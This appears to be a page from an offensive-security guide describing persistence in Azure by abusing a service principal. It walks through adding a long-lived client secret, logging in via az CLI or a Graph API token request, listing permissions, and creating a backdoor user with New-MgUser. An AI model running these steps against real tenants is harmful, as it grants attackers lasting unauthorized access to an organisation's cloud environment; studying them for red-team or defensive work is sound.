Service Principal Abuse

This persistence method consists in backdooring Azure applications leveraging the permissions of a SP account to gain SSO access to the environment with the permissions of that applications without the need for credentials.

The main benefits of attacking SP accounts is that these accounts can't have MFA enforced on login and they are created by default along with any application, the only downside is the possible presence of a Conditional Access Policy that enforces other conditions on the login process but it still isn't enough to set MFA on a Service Principal account.

Once we created an application (or we took control of an existing one) we want to add a Client Secret with a pretty generous expiration period; this secret is the password we'll be able to use to log into the application. As we already did in Abusing Cloud Administrator Role we can now log into the application as a Service Principal

PS /home/otter> az login --service-prinipal -u <application_id> -p <client_secret> --tenant <tenant_id>

Another method we can use to log into the SP account is using Graph API

PS /home/otter> $AppId = "<app_id>"
PS /home/otter> $TenantId = "<tenant_id>"
PS /home/otter> $ClientSecret = "<client_secret>"
PS /home/otter> $body = @{
>> Grant_Type = "client_credentials"
>> Scope = "https://graph.microsoft.com/.default"
>> Client_Id = $AppId
>> Client_Secret = $ClientSecret
>> }
PS /home/otter> $connection = Invoke-RestMethod `
>> -Uri https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token `
>> -Method POST `
>> -Body $body
PS /home/otter> $token = $connection.access_token
PS /home/otter> Connect-MgGraph -AccessToken $token

Since the SP account has the same permissions as its application we need to pick an application with "interesting" permissions over the tenant; ideally we'd want to create a new user account as a persistence mechanism, to do so we need the new-MgUser permissions so can use the following commands to list all the permissions required to perform that action.

PS /home/otter> (Find-MgGraphCommand -command new-MgUser).permissions
# list permissions we have
PS /home/otter> Get-MgContext | Select -ExpandProperty Scopes

If the application already has these permissions or we can delegate them to the app itself we are able to create a new user account.

PS /home/otter> New-MgUser -DisplayName "Otter Sec" -PasswordProfile $PasswordProfile -AccountDisabled -MailNickName "otter" -UserPrincipalName "ottersec@minions.onmicrosoft.com"

The final step is to log in as this user and change their password.

PreviousAAD Federated BackdoorNextCompromising Azure Blobs and Storage Accounts

Last updated